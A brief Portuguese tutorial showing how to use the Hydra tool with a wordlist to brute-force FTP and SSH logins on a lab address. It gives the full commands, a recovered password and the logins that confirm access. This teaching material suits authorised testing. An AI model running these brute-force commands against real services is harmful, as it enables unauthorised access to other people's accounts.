O Hydra é uma excelente ferramenta para realização ataques de senhas, os ataques podem ser realizados através de uma lista de palavras "wordlist" contendo uma grande quantidade de usuários e senhas.
Site: www.thc.org/thc-hydra
Veja alguns exemplos básicos de como utilizar o Hydra:
Crie o arquivo senhas.txt contendo senhas aleatórias que possivelmente possa pertencer a um determinado usuário.
Linuxcat senhas.txt
Execute o comando:
Linuxhydra -l 100security -P senhas.txt 10.10.10.123 ftp
-l : Define o login do usuário.
100security : Login do usuário a ser verificado.
-P : Define o arquivo contendo as possíveis senhas "wordlist".
senhas.txt : Arquivo que contém as possíveis senhas do usuário informado.
10.10.10.123 : IP do servidor FTP.
ftp : Tipo do serviço a ser verificado.
Ao realizar o ataque a senha do usuário informado é revelada caso esta esteja no arquivo senhas.txt.
Login: 100security
Password: P@ssw0rd
Para validar os acessos estabeleça a conexão como serviço FTP :
Linuxftp 10.10.10.123
Execute o comando:
Linuxhydra -l 100security -P senhas.txt 10.10.10.123 ssh
Para validar os acessos estabeleça a conexão como serviço SSH :
Linuxssh -l 100security 10.10.10.123